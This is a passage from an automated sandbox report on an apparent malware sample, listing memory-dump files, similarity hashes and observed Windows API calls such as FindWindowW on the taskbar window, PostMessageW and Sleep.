                                                          • Part of subcall function 0070E97B: Sleep.KERNEL32 ref: 0070E9F3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: FindMessagePostSleepWindow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 529655941-2988720461
                                                        • Opcode ID: 746ddf131aa25be72839255e1b0a06a3ddbe5bfe4739ad03c0842e17e1ae8aeb
                                                        • Instruction ID: 4ddda38d093197e64ff5760f1bef0da616df767a44edbbda5a617e4f73a86b3c
                                                        • Opcode Fuzzy Hash: 746ddf131aa25be72839255e1b0a06a3ddbe5bfe4739ad03c0842e17e1ae8aeb
                                                        • Instruction Fuzzy Hash: 25D0C972391310BAF665A770DC0FFC676549B05B11F508A567646BA1D0C9A8B8018B58
                                                        APIs
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0073232C
                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0073233F
                                                          • Part of subcall function 0070E97B: Sleep.KERNEL32 ref: 0070E9F3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: FindMessagePostSleepWindow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 529655941-2988720461
                                                        • Opcode ID: 151dc7b74be48d65e009223d57b87ff2a8aa16a940d69d3d4273694e28c22c39
                                                        • Instruction ID: 7c7511f28386dba0504acf84e60c52a219e631ad6035ec6a4aaee489897cec00
                                                        • Opcode Fuzzy Hash: 151dc7b74be48d65e009223d57b87ff2a8aa16a940d69d3d4273694e28c22c39
                                                        • Instruction Fuzzy Hash: 62D0C976394310F6E664A770DC0FFC67A549B00B11F108A567646BA1D0C9A8A8018B58